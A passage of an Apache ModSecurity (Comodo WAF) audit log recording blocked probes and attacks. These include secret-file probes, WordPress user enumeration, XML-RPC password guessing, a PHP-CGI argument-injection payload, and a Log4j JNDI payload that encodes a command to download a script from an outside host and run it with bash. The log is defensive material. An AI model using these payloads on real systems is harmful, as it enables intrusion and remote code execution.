(Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d60b442-Z-- --37cb573f-A-- [24/May/2025:18:06:35 +0700] aDGoO-O2UzDOKMmK0i6lNwAAAAA 103.236.140.4 56810 103.236.140.4 8181 --37cb573f-B-- GET /site.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --37cb573f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37cb573f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084795319677 1748 (- - -) Stopwatch2: 1748084795319677 1748; combined=628, p1=310, p2=291, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37cb573f-Z-- --aba5f532-A-- [24/May/2025:18:06:35 +0700] aDGoO-unkxaVeh4NwhbTqwAAAEw 103.236.140.4 56828 103.236.140.4 8181 --aba5f532-B-- GET /.profile HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --aba5f532-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aba5f532-H-- Message: Access denied with code 403 (phase 2). String match "/.profile" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "6621"] [id "243320"] [rev "1"] [msg "COMODO WAF: Information disclosure vulnerability in Cloud Foundry PHP Buildpack (aka php-buildpack) before 4.3.18 and PHP Buildpack Cf-release before 242, as used in Pivotal Cloud Foundry (PCF) Elastic Runtime before 1.6.38 and 1.7.x before 1.7.19 and other products (CVE-2016-6639)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084795877087 2568 (- - -) Stopwatch2: 1748084795877087 2568; combined=1560, p1=326, p2=1207, p3=0, p4=0, p5=27, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aba5f532-Z-- --07c17962-A-- [24/May/2025:18:06:36 +0700] aDGoPOO2UzDOKMmK0i6lPwAAABc 103.236.140.4 56836 103.236.140.4 8181 --07c17962-B-- GET /secret.key HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --07c17962-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07c17962-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084796056548 1888 (- - -) Stopwatch2: 1748084796056548 1888; combined=664, p1=281, p2=355, p3=0, p4=0, p5=27, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07c17962-Z-- --a8344a3f-A-- [24/May/2025:18:07:31 +0700] aDGoc-O2UzDOKMmK0i6ldwAAAAQ 103.236.140.4 57128 103.236.140.4 8181 --a8344a3f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 201.20.73.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 201.20.73.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a8344a3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8344a3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084851547148 3357 (- - -) Stopwatch2: 1748084851547148 3357; combined=1465, p1=508, p2=925, p3=0, p4=0, p5=32, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8344a3f-Z-- --04ed026e-A-- [24/May/2025:18:14:56 +0700] aDGqMOO2UzDOKMmK0i6l_gAAAAw 103.236.140.4 59078 103.236.140.4 8181 --04ed026e-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --04ed026e-C-- --04ed026e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04ed026e-E-- --04ed026e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748085296298888 3668 (- - -) Stopwatch2: 1748085296298888 3668; combined=2718, p1=462, p2=2224, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04ed026e-Z-- --d4a5bb42-A-- [24/May/2025:18:34:02 +0700] aDGuquunkxaVeh4NwhbXcAAAAE4 103.236.140.4 36670 103.236.140.4 8181 --d4a5bb42-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.235.166.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.235.166.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d4a5bb42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4a5bb42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748086442611318 2103 (- - -) Stopwatch2: 1748086442611318 2103; combined=975, p1=340, p2=609, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4a5bb42-Z-- --29d7f97b-A-- [24/May/2025:18:34:25 +0700] aDGuweunkxaVeh4NwhbXdwAAAFY 103.236.140.4 36702 103.236.140.4 8181 --29d7f97b-B-- GET / HTTP/1.0 Referer: ${jndi:ldap:/161.97.111.76:1389/Basic/Command/Base64/KGN1cmwgLXMgaHR0cDovMTYxLjk3LjExMS43Ni9lZ2V0LnNofHx3Z2V0IC1xIC1PLSBodHRwOi8xNjEuOTcuMTExLjc2L2VnZXQuc2gpfGJhc2g=} Host: 103.236.140.4 Cookie: ${jndi:ldap:/161.97.111.76:1389/Basic/Command/Base64/KGN1cmwgLXMgaHR0cDovMTYxLjk3LjExMS43Ni9lZ2V0LnNofHx3Z2V0IC1xIC1PLSBodHRwOi8xNjEuOTcuMTExLjc2L2VnZXQuc2gpfGJhc2g=} X-Real-IP: 161.97.111.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: ${jndi:ldap:/161.97.111.76:1389/Basic/Command/Base64/KGN1cmwgLXMgaHR0cDovMTYxLjk3LjExMS43Ni9lZ2V0LnNofHx3Z2V0IC1xIC1PLSBodHRwOi8xNjEuOTcuMTExLjc2L2VnZXQuc2gpfGJhc2g=} X-Forwarded-Proto: http Connection: close Authorization: Oauth ${jndi:ldap:/161.97.111.76:1389/Basic/Command/Base64/KGN1cmwgLXMgaHR0cDovMTYxLjk3LjExMS43Ni9lZ2V0LnNofHx3Z2V0IC1xIC1PLSBodHRwOi8xNjEuOTcuMTExLjc2L2VnZXQuc2gpfGJhc2g=} Accept: */* X-Api-Version: ${jndi:ldap:/161.97.111.76:1389/Basic/Command/Base64/KGN1cmwgLXMgaHR0cDovMTYxLjk3LjExMS43Ni9lZ2V0LnNofHx3Z2V0IC1xIC1PLSBodHRwOi8xNjEuOTcuMTExLjc2L2VnZXQuc2gpfGJhc2g=} User-Agent: ${jndi:ldap:/161.97.111.76:1389/Basic/Command/Base64/KGN1cmwgLXMgaHR0cDovMTYxLjk3LjExMS43Ni9lZ2V0LnNofHx3Z2V0IC1xIC1PLSBodHRwOi8xNjEuOTcuMTExLjc2L2VnZXQuc2gpfGJhc2g=} --29d7f97b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29d7f97b-E-- --29d7f97b-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at REQUEST_HEADERS:Referer. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||103.236.140.4|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748086465117203 4106 (- - -) Stopwatch2: 1748086465117203 4106; combined=3085, p1=409, p2=2650, p3=0, p4=0, p5=26, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29d7f97b-Z-- --069bf767-A-- [24/May/2025:18:48:08 +0700] aDGx-DvI5DIWBJ2mFG5Q2AAAANg 103.236.140.4 38840 103.236.140.4 8181 --069bf767-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 43.231.115.89 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 43.231.115.89 X-Forwarded-Proto: https Connection: close Content-Length: 490 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --069bf767-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinantix-admin1122 --069bf767-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --069bf767-E-- --069bf767-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 43.231.115.89 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748087288958917 5668 (- - -) Stopwatch2: 1748087288958917 5668; combined=3912, p1=482, p2=3285, p3=0, p4=0, p5=87, sr=99, sw=58, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --069bf767-Z-- --f9e79602-A-- [24/May/2025:18:54:59 +0700] aDGzkzvI5DIWBJ2mFG5TZwAAANQ 103.236.140.4 46548 103.236.140.4 8181 --f9e79602-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 43.231.115.89 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 43.231.115.89 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f9e79602-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinadmin_antix99 --f9e79602-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9e79602-E-- --f9e79602-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 43.231.115.89 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748087699864000 5656 (- - -) Stopwatch2: 1748087699864000 5656; combined=4227, p1=508, p2=3544, p3=0, p4=0, p5=104, sr=91, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9e79602-Z-- --11028913-A-- [24/May/2025:19:11:46 +0700] aDG3guO2UzDOKMmK0i6qqwAAAA8 103.236.140.4 54350 103.236.140.4 8181 --11028913-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.120.168 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.120.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --11028913-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11028913-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748088706863647 882 (- - -) Stopwatch2: 1748088706863647 882; combined=346, p1=305, p2=0, p3=0, p4=0, p5=41, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11028913-Z-- --16ef8627-A-- [24/May/2025:19:17:12 +0700] aDG4yOO2UzDOKMmK0i6rYAAAAAw 103.236.140.4 58782 103.236.140.4 8181 --16ef8627-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 94.26.90.247 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 94.26.90.247 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Accept: */* --16ef8627-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16ef8627-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748089032900725 13472 (- - -) Stopwatch2: 1748089032900725 13472; combined=25881, p1=243, p2=0, p3=0, p4=0, p5=12840, sr=68, sw=0, l=0, gc=12798 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16ef8627-Z-- --3657023c-A-- [24/May/2025:19:25:24 +0700] aDG6tOunkxaVeh4NwhbgUQAAAEw 103.236.140.4 37942 103.236.140.4 8181 --3657023c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 178.72.192.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.72.192.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3657023c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3657023c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748089524282749 2628 (- - -) Stopwatch2: 1748089524282749 2628; combined=1201, p1=413, p2=760, p3=0, p4=0, p5=27, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3657023c-Z-- --e213332b-A-- [24/May/2025:19:28:53 +0700] aDG7hfmzt4abyoi_U9kMCAAAAIs 103.236.140.4 44450 103.236.140.4 8181 --e213332b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 125.212.243.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 125.212.243.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e213332b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e213332b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748089733135942 3231 (- - -) Stopwatch2: 1748089733135942 3231; combined=1452, p1=512, p2=905, p3=0, p4=0, p5=35, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e213332b-Z-- --80e46802-A-- [24/May/2025:19:49:49 +0700] aDHAbeunkxaVeh4NwhbluwAAAEc 103.236.140.4 56844 103.236.140.4 8181 --80e46802-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 185.18.232.22 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 185.18.232.22 X-Forwarded-Proto: https Connection: close Content-Length: 492 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --80e46802-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinsolihin!@#$%^&*() --80e46802-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --80e46802-E-- --80e46802-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748090989070091 6417 (- - -) Stopwatch2: 1748090989070091 6417; combined=4753, p1=519, p2=3998, p3=34, p4=36, p5=100, sr=89, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80e46802-Z-- --a222a53a-A-- [24/May/2025:19:52:21 +0700] aDHBBeunkxaVeh4NwhblyAAAAE4 103.236.140.4 56926 103.236.140.4 8181 --a222a53a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 173.252.167.130 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 173.252.167.130 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a222a53a-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihin&solihin& --a222a53a-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --a222a53a-E-- --a222a53a-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748091141975385 6227 (- - -) Stopwatch2: 1748091141975385 6227; combined=4744, p1=500, p2=3986, p3=33, p4=36, p5=127, sr=94, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a222a53a-Z-- --3608241c-A-- [24/May/2025:19:53:51 +0700] aDHBX-unkxaVeh4NwhblzwAAAFY 103.236.140.4 57008 103.236.140.4 8181 --3608241c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.144.127.41 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.144.127.41 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3608241c-C-- 